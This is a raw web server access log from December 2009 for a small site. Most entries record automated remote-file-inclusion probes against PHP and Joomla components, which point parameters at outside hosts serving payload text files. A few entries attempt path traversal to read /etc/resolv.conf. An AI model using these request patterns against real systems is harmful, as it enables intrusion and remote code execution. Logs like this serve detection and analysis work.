89.203.208.203 - - [13/Dec/2009:11:02:24 -0800] "GET /logs/access_080425.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:03:25 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:03:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:03:25 -0800] "GET /logs/access_080522.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:03:31 -0800] "GET /logs/access_071122.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:04:04 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:04:04 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:04:04 -0800] "GET /logs/access_080522.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:04:09 -0800] "GET /logs/access_071122.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.71.237.150 - - [13/Dec/2009:11:04:34 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:04:44 -0800] "GET /logs/access_090429.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:04:45 -0800] "GET /logs/access_090406.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:04:47 -0800] "GET /logs/access_090126.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:05:06 -0800] "GET /logs/access_081226.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
83.167.62.165 - - [13/Dec/2009:11:05:11 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "dmulk.com"
64.157.4.41 - - [13/Dec/2009:11:05:13 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
83.167.62.165 - - [13/Dec/2009:11:05:14 -0800] "GET /blog/index.php/2008/08/16/techstoc-2008-71208/?show=slide HTTP/1.1" 200 12614 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "dmulk.com"
83.167.62.165 - - [13/Dec/2009:11:05:20 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
83.167.62.165 - - [13/Dec/2009:11:05:21 -0800] "GET /megumi/?M=D HTTP/1.1" 200 1611 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
67.210.218.88 - - [13/Dec/2009:11:05:30 -0800] "GET /blog/index.php/feed HTTP/1.1" 200 1944 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:20 -0800] "GET /include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:20 -0800] "GET /logs/access_080410.log//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:20 -0800] "GET /logs//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:24 -0800] "GET /logs/access_080410.log//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:24 -0800] "GET /include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:25 -0800] "GET /logs//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:37 -0800] "GET /logs/access_091007.log//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:07:46 -0800] "GET /logs/access_091007.log//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:09:23 -0800] "GET /logs/access_080410.log%20%20//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:09:24 -0800] "GET /logs/access_080410.log%20%20//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:09:27 -0800] "GET /logs/access_091007.log%20%20//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:09:29 -0800] "GET /logs/access_091007.log%20%20//include.php?path[docroot]=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:09:44 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:09:44 -0800] "GET /logs/access_090512.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:09:45 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:09:48 -0800] "GET /logs/access_090826.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET ///appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET /logs/access_090917.log%20%20////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET ///appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:38 -0800] "GET /logs/access_090917.log%20%20////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:58 -0800] "GET /logs/access_090918.log%20%20////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:10:58 -0800] "GET /logs/access_090918.log%20%20////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:32 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:32 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:32 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:32 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:32 -0800] "GET /logs/access_081010.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:33 -0800] "GET /errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:33 -0800] "GET /logs/access_081010.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:33 -0800] "GET /logs/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:34 -0800] "GET /logs/access_081010.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:40 -0800] "GET /logs/access_080703.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:41 -0800] "GET /logs/access_080703.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:11:42 -0800] "GET /logs/access_080703.log%20%20/errors.php?error=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:12:34 -0800] "GET /logs/access_090512.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:35 -0800] "GET /logs/access_081204.log//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:35 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:35 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:35 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:38 -0800] "GET /logs/access_081204.log//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:12:38 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:12:42 -0800] "GET /logs/access_090917.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:12:43 -0800] "GET /logs/access_090918.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:12:43 -0800] "GET /logs/access_090826.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:12:44 -0800] "GET /logs/access_090917.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.19.51.194 - - [13/Dec/2009:11:12:44 -0800] "GET /logs/access_090918.log////appserv/main.php?appserv_root=http://www.baeza-sa.com//db/zonas/dbFiles/pages/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:13:32 -0800] "GET //skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:13:32 -0800] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:13:32 -0800] "GET /logs/access_080619.log///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:13:43 -0800] "GET /logs/access_081029.log///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:18 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:18 -0800] "GET /logs/access_080320.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:18 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:18 -0800] "GET /logs/access_080222.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:20 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:20 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:20 -0800] "GET /logs/access_080320.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:14:21 -0800] "GET /logs/access_080222.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:14:59 -0800] "GET //skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:14:59 -0800] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:14:59 -0800] "GET /logs/access_081226.log///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:16:13 -0800] "GET /logs/access_080619.log/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:16:14 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 130075 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:16:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 200 14950 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:16:15 -0800] "GET /logs/access_090814.log/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:16:16 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 200 14923 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:16:18 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 200 14926 "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:16:20 -0800] "GET /index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 200 14919 "-" "-" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:32 -0800] "GET /logs/access_081111.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:32 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:32 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:47 -0800] "GET /logs/access_081111.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:47 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:16:47 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:16:49 -0800] "GET /logs/access_080619.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:16:57 -0800] "GET /logs/access_081204.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:16:57 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:16:58 -0800] "GET /logs/access_081204.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:16:58 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:16:59 -0800] "GET /logs/access_081029.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:17:04 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:17:04 -0800] "GET /logs/access_081111.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:17:05 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:09 -0800] "GET /logs/access_081111.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:09 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:09 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:25 -0800] "GET /logs/access_081111.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:25 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:25 -0800] "GET /logs///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:17:26 -0800] "GET //skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:17:26 -0800] "GET /logs///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:17:26 -0800] "GET /logs/access_091029.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:17:27 -0800] "GET /logs/access_081111.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:17:27 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:17:27 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:37 -0800] "GET /logs/access_080916.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:17:52 -0800] "GET /logs/access_080916.log///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:18:33 -0800] "GET /logs/access_081111.log%20%20///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:18:33 -0800] "GET //?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 200 14914 "-" "Mozilla/5.0" "www.dmulk.com"
